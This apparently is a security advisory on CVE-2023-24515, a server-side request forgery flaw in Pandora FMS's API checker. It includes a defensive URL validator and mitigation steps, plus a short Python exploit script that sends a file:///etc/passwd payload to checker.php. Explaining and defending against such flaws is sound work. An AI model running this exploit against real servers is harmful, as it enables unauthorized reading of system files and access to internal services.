Pandora FMS (Flexible Monitoring System) is a popular open-source system monitoring tool, often deployed for proactive troubleshooting and monitoring of system health. However, a recent critical vulnerability, tracked as CVE-2023-24515, has been discovered in the API checker of Pandora FMS. It is a Server-Side Request Forgery (SSRF) that allows a malicious user to fetch internal content, potentially exposing sensitive information. The issue affects Pandora FMS v767 and earlier on all platforms.

Vulnerability Details

The primary issue is that the application does not check the URL scheme when retrieving API URLs. Instead of validating and limiting URL schemes to the standard http/https, the application accepts other schemes such as file://. As a result, an attacker can use the API checker function to load file contents from the local server or to issue requests on behalf of the server, gaining unauthorized access to internal resources.
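The check that is missing here can be written as a short validator. The following is an added example, not Pandora FMS code and not the vendor's fix: the names validate_fetch_url, resolve_host and UnsafeURL are hypothetical, and it goes one step beyond the scheme allow-list by also refusing hosts that resolve to loopback, private or link-local addresses, since the paragraph above also describes requests to internal resources.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # everything else (file, gopher, ...) is refused


class UnsafeURL(ValueError):
    """The user-supplied URL must not be fetched by the server."""


def resolve_host(host):  # default resolver: every address the name maps to
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def validate_fetch_url(url, resolver=resolve_host):
    """Return the vetted IP addresses for url, or raise UnsafeURL."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError as exc:  # malformed authority, e.g. broken IPv6 literal
        raise UnsafeURL(f"malformed URL: {exc}") from exc
    if parts.scheme not in ALLOWED_SCHEMES:  # urlsplit lower-cases the scheme
        raise UnsafeURL(f"scheme {parts.scheme!r} is not allowed")
    if not host:
        raise UnsafeURL("URL has no host")
    try:
        addresses = set(resolver(host))
    except OSError as exc:
        raise UnsafeURL(f"cannot resolve {host!r}: {exc}") from exc
    if not addresses:
        raise UnsafeURL(f"{host!r} did not resolve")
    for addr in addresses:
        ip = ipaddress.ip_address(addr.split("%")[0])  # drop IPv6 zone id
        ip = getattr(ip, "ipv4_mapped", None) or ip    # unwrap ::ffff:a.b.c.d
        if not ip.is_global:  # loopback, RFC 1918, link-local, metadata, ...
            raise UnsafeURL(f"{host!r} resolves to non-public address {ip}")
    return addresses


if __name__ == "__main__":
    # Constructed resolver and URLs so the demo runs offline.
    fake_dns = {"monitor.example.com": {"93.184.216.34"}, "intranet.example.com": {"10.0.0.5"}}
    lookup = lambda h: fake_dns.get(h, {h})  # IP literals resolve to themselves
    for u in ("https://monitor.example.com/api", "file:///etc/passwd",
              "http://169.254.169.254/", "http://intranet.example.com/"):
        try:
            print("allow", u, validate_fetch_url(u, lookup))
        except UnsafeURL as why:
            print("block", u, "->", why)
```

Validation on its own does not cover DNS rebinding or redirects: the fetch should connect to one of the returned addresses and run every redirect target through the same check.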

Exploit Example

To demonstrate the impact of the vulnerability, we provide an example code snippet exploiting the SSRF.

```python
# Example exploit using Python
import requests

PANDORA_BASE_URL = 'http://pandora.example.com'  # Replace with the target Pandora FMS URL
API_CHECKER_URL = f'{PANDORA_BASE_URL}/include/api/checker.php?'

payload = {
    'url': 'file:///etc/passwd',  # Target file on the server
    'type': 'url_request',
    'output': 'json',
}

response = requests.post(API_CHECKER_URL, data=payload)

if response.ok:
    print("Exploit succeeded! File content:")
    print(response.text)
else:
    print("Exploit failed.")
```

This script shows how an attacker can use the vulnerability to fetch the contents of the server's /etc/passwd file. The same technique could be used to read other sensitive system files, or to target internal APIs or services and potentially gain further control over the server.

Mitigation

1. Upgrade your Pandora FMS server to the latest version, v768 or newer, which has the fix for this vulnerability.
2. Limit access to the API checker endpoint, if possible, to only trusted IP addresses or internal networks.

Conclusion

CVE-2023-24515 represents a critical vulnerability in Pandora FMS' API checker, which exposes the application to Server-Side Request Forgery (SSRF) attacks. The lack of URL scheme validation allows an attacker to access sensitive internal data or perform unauthorized actions on behalf of the targeted server. It is essential to upgrade your Pandora FMS installation to the latest version addressing this issue and consider restricting access to the API checker endpoint.

Timeline

Published on: 08/22/2023 19:16:00 UTC
Last modified on: 10/18/2023 12:15:00 UTC